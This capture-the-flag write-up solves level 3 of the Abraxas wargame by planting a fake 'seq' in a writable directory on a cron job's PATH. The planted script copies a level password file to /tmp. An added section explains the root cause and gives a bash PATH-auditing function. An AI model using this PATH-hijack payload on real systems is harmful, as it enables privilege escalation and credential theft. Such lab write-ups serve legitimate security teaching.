[HES 2011] Abraxas Wargame - Level 3
Hello,
Level3, here we come!
Clues from the logbook:
- “she’s currently testing with generated datasets.”
- “The entire thing is written in bash and runs as a cronjob every 10 minutes.”
We look at the cronjob to locate the script:
$ cat /etc/cron.d/lifesupport_process
*/10 * * * * level3 /home/level3/bin/lifesupport_process.sh &> /dev/null
We read it:
$ cat /home/level3/bin/lifesupport_process.sh
#!/bin/bash
datadir=/opt/lifesupportdata
scriptdir=/home/level3/bin/
PATH=$datadir:.:$scriptdir:$PATH
cd $scriptdir
. common.inc.sh
# life support stats
data=$($scriptdir/lifesupport_data.sh)
echo "Orig: $data"
echo -n "Sorted: "; mysort $data
echo -n "Sum: "; sum $data
echo -n "Average: "; avg $data
echo -n "Max: "; max $data
echo -n "Min: "; min $data
echo -n "Cumulated: "; cumul $data
Mmm, we can see datadir in PATH! Interesting.
Let’s look at its permissions:
$ ls -lash /opt/
total 16K
4.0K drwxr-xr-x 4 root root 4.0K 2011-04-06 10:54 .
4.0K drwxr-xr-x 21 root root 4.0K 2011-09-02 14:17 ..
4.0K drwx-wx--x 2 root level2 4.0K 2013-03-06 02:17 lifesupportdata
4.0K drwxr-xr-x 6 root root 4.0K 2011-04-05 00:07 workpackagebuilder
We can write to /opt/lifesupportdata! So we can use PATH to redirect to our script. I tried with echo but had no luck, so I looked at lifesupport_data.sh:
$ cat /home/level3/bin/lifesupport_data.sh
#!/bin/bash
# FIXME: There is no kernel module yet to retrieve life support data
# This script just spits out random data, so we can at least test the processing scripts
for i in `seq 1 10`;
do
echo -n $((RANDOM % 100))
echo -n " "
done
echo
seq works wonderfully: unlike echo, which is a bash builtin, it is an external command that bash looks up through PATH. Here is the exploit:
#!/bin/sh
cat << EOF > /opt/lifesupportdata/seq
#!/bin/sh
/bin/cat /etc/pass/level3 > /tmp/lvl3.pass
EOF
chmod a+x /opt/lifesupportdata/seq
And yes, the script runs as whatever id you run it as, so you can do anything. Now, you’ve just got to wait for the next 10-minute cron run ;).
Cheers,
m_101
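
The root cause in this level is a PATH that contains a directory another user can write to, plus the relative entry ".". As an added example (not part of the original post or of the wargame's scripts), this bash function audits a PATH string for both conditions; the name audit_path and the /usr/bin:/bin tail standing in for $PATH are assumptions.

```shell
#!/bin/bash
# Added example, not from the original post: audit a PATH string for entries
# that would let another user plant a command (as happened with seq above).

# audit_path PATHSTRING
# Prints one finding per risky entry. Returns 1 if any finding, 0 otherwise.
audit_path() {
    local path_string=$1 entry perms status=0
    local -a entries
    # Append ':' so a trailing empty entry survives the split.
    IFS=: read -r -a entries <<< "${path_string}:"
    for entry in "${entries[@]}"; do
        case $entry in
            '') echo "RELATIVE: empty entry (means the current directory)"
                status=1; continue ;;
            /*) ;;                                  # absolute: check perms below
            *)  echo "RELATIVE: $entry"
                status=1; continue ;;
        esac
        [ -d "$entry" ] || continue                 # missing dirs cannot be searched
        # -L follows symlinks so the target directory's mode is inspected.
        perms=$(ls -ldL -- "$entry" | cut -c1-10)
        # Index 5 is the group write bit, index 8 the world write bit.
        if [ "${perms:5:1}" = w ] || [ "${perms:8:1}" = w ]; then
            echo "WRITABLE: $entry ($perms)"
            status=1
        fi
    done
    return $status
}

# The PATH built by lifesupport_process.sh; /usr/bin:/bin is an assumed
# stand-in for the inherited $PATH.
audit_path "/opt/lifesupportdata:.:/home/level3/bin/:/usr/bin:/bin" || true
```

For the cron script itself, the matching fix is to set PATH to a fixed list of root-owned directories and call its helpers by absolute path, so that neither the data directory nor "." is ever searched for commands.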